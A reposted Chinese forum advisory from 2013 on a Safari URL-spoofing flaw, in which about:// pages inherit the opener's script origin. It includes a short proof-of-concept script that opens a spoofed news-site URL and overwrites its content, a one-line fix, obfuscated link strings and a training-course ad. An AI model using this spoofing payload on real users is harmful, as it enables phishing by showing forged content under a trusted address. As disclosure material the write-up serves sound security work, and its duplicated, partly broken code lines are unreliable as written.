-
-
[转帖]Safari浏览器设计不当存在URL欺骗
-
发表于:
2013-2-19 16:39
2494
-
由于某些URL协议实现的不严谨导致URL欺骗漏洞
在safari下about://xxxxxxx 会被视为一个有效资源页,而且和about:blank有同样功效,可以继承effective script origin,所以我们可以通过打开一个about://
64bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4@1p5H3i4@1t1%4i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1#2i4K6W2o6i4@1t1H3i4@1f1#2i4K6W2p5i4K6R3H3i4@1f1$3i4K6W2p5i4@1p5#2i4@1f1#2i4K6R3I4i4K6W2m8g2g2u0x3i4@1f1$3i4@1q4o6i4@1u0m8i4@1f1&6i4@1q4m8i4K6V1%4i4K6u0W2
POC:
<script>
<script>
function poc(){
var w=open('about://view.news.qq.com/zt2012/modern_times/index.htm');
w.document.body.innerHTML='I'm sogili hehehe';
}
</script>
<button onclick=poc();>clickme</button>
<button onclick=poc();>clickme</button>
修复方案:
严格限定about协议的源继承.
来源:
e6bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6e0u0U0N6r3!0Q4x3X3g2U0L8$3#2Q4x3V1k6m8M7Y4c8A6j5$3I4W2i4K6u0r3x3U0l9I4x3K6l9J5i4K6u0r3x3e0R3&6x3o6f1$3i4K6u0W2K9s2c8E0L8l9`.`.
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
